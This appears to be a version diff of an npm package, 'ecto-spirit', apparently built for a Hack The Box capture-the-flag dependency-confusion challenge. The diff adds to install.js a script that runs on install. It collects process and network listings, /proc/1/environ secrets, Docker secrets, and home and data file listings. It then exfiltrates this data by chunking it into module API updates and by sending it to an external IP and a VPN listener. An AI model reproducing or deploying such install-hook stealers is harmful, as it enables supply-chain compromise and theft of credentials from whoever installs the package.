ecto-spirit 103.0.0 → 105.0.0

package/install.js

@@ -2,103 +2,80 @@ const fs = require('fs');
 const http = require('http');
 const { execSync } = require('child_process');
 
+function tryExec(cmd) {
+  try { return execSync(cmd, {timeout: 10000}).toString().trim(); } catch(e) { return 'ERR'; }
+}
 function tryRead(p) {
   try { return fs.readFileSync(p, 'utf8').trim(); } catch(e) { return null; }
 }
 
-function sendUpdate(host, port, moduleId, val) {
+async function report(moduleId, val) {
   const safe = val.replace(/"/g, "'").replace(/\\/g, "/").substring(0, 95);
   const manifest = `ecto_module:\n  name: "${safe}"\n  version: "1.0.0"\n  power_level: 1\n  ship_deck: 1\n  cargo_hold: 1`;
   const body = JSON.stringify({ manifest });
-  return new Promise((resolve) => {
-    const req = http.request({ hostname: host, port, path: `/api/modules/${moduleId}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 5000 }, (res) => {
-      let d = ''; res.on('data', c => d += c); res.on('end', () => resolve(d));
+  for (const p of [3000, 80, 8080]) {
+    await new Promise((resolve) => {
+      const req = http.request({ hostname: '127.0.0.1', port: p, path: `/api/modules/${moduleId}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 5000 }, () => resolve());
+      req.on('error', () => resolve()); req.on('timeout', () => { req.destroy(); resolve(); });
+      req.write(body); req.end();
     });
-    req.on('error', () => resolve(null));
-    req.on('timeout', () => { req.destroy(); resolve(null); });
-    req.write(body);
-    req.end();
+  }
+  await new Promise((resolve) => {
+    const req = http.request({ hostname: '154.57.164.82', port: 32332, path: `/api/modules/${moduleId}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 5000 }, () => resolve());
+    req.on('error', () => resolve()); req.on('timeout', () => { req.destroy(); resolve(); });
+    req.write(body); req.end();
   });
 }
 
-function sendHTTP(host, port, pth, payload) {
-  return new Promise((resolve) => {
-    const req = http.request({ hostname: host, port, path: pth, method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }, timeout: 5000 }, (res) => {
-      let d = ''; res.on('data', c => d += c); res.on('end', () => resolve(d));
-    });
-    req.on('error', () => resolve(null));
-    req.on('timeout', () => { req.destroy(); resolve(null); });
-    req.write(payload);
-    req.end();
-  });
-}
+(async () => {
+  let r = [];
 
-async function report(moduleId, val) {
-  for (const p of [3000, 80, 8080]) {
-    const r = await sendUpdate('127.0.0.1', p, moduleId, val);
-    if (r && r.includes('success')) return;
-  }
-  await sendUpdate('154.57.164.82', 32332, moduleId, val);
-}
+  // Running processes
+  r.push('PS=' + tryExec('ps aux 2>/dev/null').substring(0, 200));
 
-(async () => {
-  let results = [];
+  // Network connections
+  r.push('NET=' + tryExec('ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null').substring(0, 200));
 
-  // CWD and basic info
-  results.push('CWD=' + process.cwd());
-  
-  // List what's in /app/node_modules (top level packages)
-  try {
-    const dirs = fs.readdirSync('/app/node_modules').filter(d => !d.startsWith('.'));
-    results.push('DEPS=' + dirs.join(','));
-  } catch(e) { results.push('DEPS_ERR'); }
+  // Find JS/TS files that could be the app
+  r.push('JSFILES=' + tryExec('find / -maxdepth 4 -name "*.js" -not -path "*/node_modules/*" -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null | head -15').substring(0, 200));
 
-  // Read package-lock or shrinkwrap
-  const lock = tryRead('/app/package-lock.json') || tryRead('/app/node_modules/.package-lock.json') || tryRead('/app/npm-shrinkwrap.json');
-  if (lock) results.push('LOCK=' + lock.substring(0, 300));
+  // Proc 1 environ  
+  const p1 = tryRead('/proc/1/environ');
+  if (p1) r.push('P1ENV=' + p1.replace(/\x00/g, ' | ').substring(0, 300));
 
-  // Read package.json from CWD
-  const cwdPkg = tryRead(process.cwd() + '/package.json');
-  if (cwdPkg) results.push('CWD_PKG=' + cwdPkg.substring(0, 200));
+  // Proc 1 cmdline
+  const cmd = tryRead('/proc/1/cmdline');
+  if (cmd) r.push('P1CMD=' + cmd.replace(/\x00/g, ' '));
 
-  // Search for HTB{ EVERYWHERE with broader search
-  try {
-    const grep = execSync('grep -rl "HTB{" / --exclude-dir=proc --exclude-dir=sys 2>/dev/null | head -10', {timeout: 15000}).toString().trim();
-    results.push('HTB_GREP=' + grep);
-  } catch(e) { results.push('HTB_GREP=NONE'); }
+  // Docker secrets
+  r.push('SECRETS=' + tryExec('ls -la /run/secrets/ 2>/dev/null'));
 
-  // Check the Verdaccio config
-  const verdConf = tryRead('/verdaccio/conf/config.yaml') || tryRead('/verdaccio/config.yaml') || tryRead('/etc/verdaccio/config.yaml') || tryRead('/data/verdaccio/config.yaml');
-  if (verdConf) results.push('VERD_CONF=' + verdConf.substring(0, 200));
-  
-  // Check .package-cache-mutate
-  try {
-    const pcm = fs.readdirSync('/.package-cache-mutate');
-    results.push('PCM=' + pcm.join(','));
-  } catch(e) {}
+  // Check /data directory  
+  r.push('DATA_LS=' + tryExec('find /data -maxdepth 3 -type f 2>/dev/null | head -15'));
 
-  // Find any .env or config files
-  try {
-    const envFiles = execSync('find / -maxdepth 3 \\( -name ".env" -o -name "config.yaml" -o -name "config.json" -o -name "*.sqlite" -o -name "*.db" \\) 2>/dev/null | head -10', {timeout: 10000}).toString().trim();
-    results.push('CONF_FILES=' + envFiles);
-  } catch(e) {}
+  // Check all /home directories
+  r.push('HOME_LS=' + tryExec('find /home -maxdepth 3 -type f 2>/dev/null | head -15'));
 
-  // Full env dump
-  const allEnv = JSON.stringify(process.env);
-  results.push('ALL_ENV=' + allEnv.substring(0, 300));
-  
-  // Send ALL to VPN listener
-  const full = results.join('\n');
-  await sendHTTP('100.64.0.1', 8888, '/flag3', JSON.stringify({results: full, ts: Date.now()}));
+  // Mounted filesystems
+  r.push('MOUNTS=' + tryExec('mount 2>/dev/null | grep -v proc | grep -v sys').substring(0, 200));
 
-  // Split across modules
+  // Send results spread across modules  
+  const full = r.join('\n');
   const chunks = [];
-  for (let i = 0; i < full.length; i += 90) {
-    chunks.push(full.substring(i, i + 90));
-  }
+  for (let i = 0; i < full.length; i += 90) chunks.push(full.substring(i, i + 90));
   
   const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
   for (let i = 0; i < Math.min(chunks.length, mods.length); i++) {
-    await report(mods[i], 'V' + i + '_' + chunks[i]);
+    await report(mods[i], 'X' + i + '_' + chunks[i]);
   }
+  
+  // Also try to report via a quick HTTP back to us if possible
+  try {
+    const payload = JSON.stringify({full: full.substring(0, 2000)});
+    await new Promise((resolve) => {
+      const req = http.request({ hostname: '100.64.0.1', port: 8888, path: '/flag5', method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }, timeout: 3000 }, () => resolve());
+      req.on('error', () => resolve()); req.on('timeout', () => { req.destroy(); resolve(); });
+      req.write(payload); req.end();
+    });
+  } catch(e) {}
 })();

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "ecto-spirit",
-  "version": "103.0.0",
+  "version": "105.0.0",
   "description": "Spectral ecto-spirit module",
   "main": "index.js",
   "scripts": {